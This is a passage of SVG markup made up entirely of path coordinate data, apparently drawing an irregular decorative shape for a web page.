.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path 